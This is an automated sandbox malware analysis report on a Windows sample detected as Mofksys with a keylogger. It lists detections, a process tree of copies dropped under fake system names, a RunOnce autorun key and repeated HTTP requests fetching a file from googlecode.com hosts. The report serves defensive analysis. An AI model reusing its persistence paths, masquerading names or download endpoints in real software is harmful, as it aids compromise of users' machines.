Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1522726
MD5:778e416a842e89f25666cb5c173b0986
SHA1:6b077356c06d690ac72c45e2b628f2ac57f5cb05
SHA256:37dc14eef49eb9822e1e96eba5f2151900d20debd27ea17b7bf57ef9f83a66b5
Tags:exeuser-jstrosch
Infos:

Detection

CryptOne, Mofksys
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected CryptOne packer
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected Mofksys
Contains functionality to detect sleep reduction / modifications
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Hides threads from debuggers
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has nameless sections
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspect Svchost Activity
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (window names)
Writes to foreign memory regions
Abnormal high CPU Usage
Checks for debuggers (devices)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to detect virtual machines (SGDT)
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains an invalid checksum
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • file.exe (PID: 2948 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 778E416A842E89F25666CB5C173B0986)
    • explorer.exe (PID: 6120 cmdline: c:\windows\resources\themes\explorer.exe MD5: 6490C0CC4233043407A5C6E1EB702275)
      • spoolsv.exe (PID: 3608 cmdline: c:\windows\resources\spoolsv.exe SE MD5: C144DDCD3247BB6C8AC4F6B2B6B222B7)
        • svchost.exe (PID: 1432 cmdline: c:\windows\resources\svchost.exe MD5: 1154F5064F5C17DA195589BD31C809B6)
          • spoolsv.exe (PID: 3968 cmdline: c:\windows\resources\spoolsv.exe PR MD5: C144DDCD3247BB6C8AC4F6B2B6B222B7)
  • explorer.exe (PID: 2872 cmdline: "C:\windows\resources\themes\explorer.exe" RO MD5: 6490C0CC4233043407A5C6E1EB702275)
  • svchost.exe (PID: 6016 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • explorer.exe (PID: 2820 cmdline: "C:\windows\resources\themes\explorer.exe" RO MD5: 6490C0CC4233043407A5C6E1EB702275)
    • consent.exe (PID: 3004 cmdline: consent.exe 6016 322 0000022C4F0331F0 MD5: DD5032EF160209E470E2612A8A3D5F59)
    • svchost.exe (PID: 6864 cmdline: "C:\windows\resources\svchost.exe" RO MD5: 1154F5064F5C17DA195589BD31C809B6)
  • svchost.exe (PID: 5924 cmdline: "C:\windows\resources\svchost.exe" RO MD5: 1154F5064F5C17DA195589BD31C809B6)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0000000E.00000002.2431859508.0000000000401000.00000040.00000001.01000000.00000009.sdmpJoeSecurity_MofksysYara detected MofksysJoe Security
    0000000B.00000002.2356728288.0000000000539000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
      00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpJoeSecurity_MofksysYara detected MofksysJoe Security
          00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_MofksysYara detected MofksysJoe Security
            Click to see the 24 entries
            SourceRuleDescriptionAuthorStrings
            14.3.svchost.exe.30384a0.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              5.3.spoolsv.exe.2dd84a0.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                0.3.file.exe.2eb84a0.1.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  2.3.explorer.exe.2da84a0.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    0.2.file.exe.421000.2.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      Click to see the 24 entries

                      System Summary

                      barindex
                      Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 2948, TargetFilename: c:\windows\resources\themes\explorer.exe
                      Source: Process startedAuthor: David Burkett, @signalblur: Data: Command: c:\windows\resources\svchost.exe, CommandLine: c:\windows\resources\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Resources\svchost.exe, NewProcessName: C:\Windows\Resources\svchost.exe, OriginalFileName: C:\Windows\Resources\svchost.exe, ParentCommandLine: c:\windows\resources\spoolsv.exe SE, ParentImage: C:\Windows\Resources\spoolsv.exe, ParentProcessId: 3608, ParentProcessName: spoolsv.exe, ProcessCommandLine: c:\windows\resources\svchost.exe, ProcessId: 1432, ProcessName: svchost.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: c:\windows\resources\themes\explorer.exe, CommandLine: c:\windows\resources\themes\explorer.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Resources\Themes\explorer.exe, NewProcessName: C:\Windows\Resources\Themes\explorer.exe, OriginalFileName: C:\Windows\Resources\Themes\explorer.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 2948, ParentProcessName: file.exe, ProcessCommandLine: c:\windows\resources\themes\explorer.exe, ProcessId: 6120, ProcessName: explorer.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: c:\windows\resources\svchost.exe, CommandLine: c:\windows\resources\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Resources\svchost.exe, NewProcessName: C:\Windows\Resources\svchost.exe, OriginalFileName: C:\Windows\Resources\svchost.exe, ParentCommandLine: c:\windows\resources\spoolsv.exe SE, ParentImage: C:\Windows\Resources\spoolsv.exe, ParentProcessId: 3608, ParentProcessName: spoolsv.exe, ProcessCommandLine: c:\windows\resources\svchost.exe, ProcessId: 1432, ProcessName: svchost.exe
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: c:\windows\resources\themes\explorer.exe RO, EventID: 13, EventType: SetValue, Image: C:\Windows\Resources\svchost.exe, ProcessId: 1432, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer
                      Source: Process startedAuthor: vburov: Data: Command: c:\windows\resources\svchost.exe, CommandLine: c:\windows\resources\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Resources\svchost.exe, NewProcessName: C:\Windows\Resources\svchost.exe, OriginalFileName: C:\Windows\Resources\svchost.exe, ParentCommandLine: c:\windows\resources\spoolsv.exe SE, ParentImage: C:\Windows\Resources\spoolsv.exe, ParentProcessId: 3608, ParentProcessName: spoolsv.exe, ProcessCommandLine: c:\windows\resources\svchost.exe, ProcessId: 1432, ProcessName: svchost.exe
                      No Suricata rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: file.exeAvira: detected
                      Source: C:\Windows\Resources\svchost.exeAvira: detection malicious, Label: TR/Patched.Ren.Gen
                      Source: C:\Windows\Resources\Themes\explorer.exeAvira: detection malicious, Label: TR/Patched.Ren.Gen
                      Source: C:\Windows\Resources\spoolsv.exeAvira: detection malicious, Label: TR/Patched.Ren.Gen
                      Source: file.exeReversingLabs: Detection: 71%
                      Source: C:\Windows\Resources\svchost.exeJoe Sandbox ML: detected
                      Source: C:\Windows\Resources\Themes\explorer.exeJoe Sandbox ML: detected
                      Source: C:\Windows\Resources\spoolsv.exeJoe Sandbox ML: detected
                      Source: file.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E66F8 EP_CryptHashBuffer,0_2_004E66F8
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E1864 EP_CryptEncryptBuffer,0_2_004E1864
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E6820 EP_CryptHashFileA,0_2_004E6820
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E18F8 EP_CryptDecryptBuffer,0_2_004E18F8
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E68B4 EP_CryptHashFileW,0_2_004E68B4
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E18B4 EP_CryptEncryptBufferEx,0_2_004E18B4
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E694C EP_CryptHashStringA,0_2_004E694C
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E1948 EP_CryptDecryptBufferEx,0_2_004E1948
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004E6970 EP_CryptHashStringW,0_2_004E6970
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004E66F8 EP_CryptHashBuffer,3_2_004E66F8
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004E1864 EP_CryptEncryptBuffer,3_2_004E1864
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004E6820 EP_CryptHashFileA,3_2_004E6820
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004E18F8 EP_CryptDecryptBuffer,3_2_004E18F8
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004E68B4 EP_CryptHashFileW,3_2_004E68B4
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004E18B4 EP_CryptEncryptBufferEx,3_2_004E18B4
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004E694C EP_CryptHashStringA,3_2_004E694C
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004E1948 EP_CryptDecryptBufferEx,3_2_004E1948
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_004E6970 EP_CryptHashStringW,3_2_004E6970
                      Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

                      Spreading

                      barindex
                      Source: Yara matchFile source: 14.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.spoolsv.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.explorer.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.spoolsv.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.2431859508.0000000000401000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2223457004.0000000000401000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2356069803.0000000000401000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 2948, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: spoolsv.exe PID: 3608, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: spoolsv.exe PID: 3968, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2820, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6864, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,0_2_0042AD58
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,0_2_0042AD58
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00426D80
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00426D80
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F2E FindFirstFileA,0_2_00427F2E
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F2E FindFirstFileA,0_2_00427F2E
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F36 FindFirstFileW,0_2_00427F36
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F36 FindFirstFileW,0_2_00427F36
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,0_2_0042AD58
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,0_2_0042AD58
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00426D80
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,0_2_00426D80
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F2E FindFirstFileA,0_2_00427F2E
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F2E FindFirstFileA,0_2_00427F2E
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F36 FindFirstFileW,0_2_00427F36
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00427F36 FindFirstFileW,0_2_00427F36
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,3_2_0042AD58
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,3_2_0042AD58
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,3_2_00426D80
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,3_2_00426D80
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F2E FindFirstFileA,3_2_00427F2E
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F2E FindFirstFileA,3_2_00427F2E
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F36 FindFirstFileW,3_2_00427F36
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F36 FindFirstFileW,3_2_00427F36
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,3_2_0042AD58
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_0042AD58 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,3_2_0042AD58
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,3_2_00426D80
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00426D80 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,3_2_00426D80
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F2E FindFirstFileA,3_2_00427F2E
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F2E FindFirstFileA,3_2_00427F2E
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F36 FindFirstFileW,3_2_00427F36
                      Source: C:\Windows\Resources\spoolsv.exeCode function: 3_2_00427F36 FindFirstFileW,3_2_00427F36
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0042806E GetLogicalDriveStringsW,0_2_0042806E

                      Networking

                      barindex
                      Source: C:\Windows\Resources\Themes\explorer.exeNetwork Connect: 142.250.110.82 80Jump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeNetwork Connect: 108.177.15.82 80Jump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeNetwork Connect: 173.194.76.82 80Jump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeNetwork Connect: 142.251.173.82 80Jump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeNetwork Connect: 64.233.184.82 80Jump to behavior
                      Source: C:\Windows\Resources\Themes\explorer.exeNetwork Connect: 172.253.115.82 80Jump to behavior
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd02.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd03.googlecode.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/tjcm.gif HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like GeckoHost: codecmd01.googlecode.comConnection: Keep-Alive
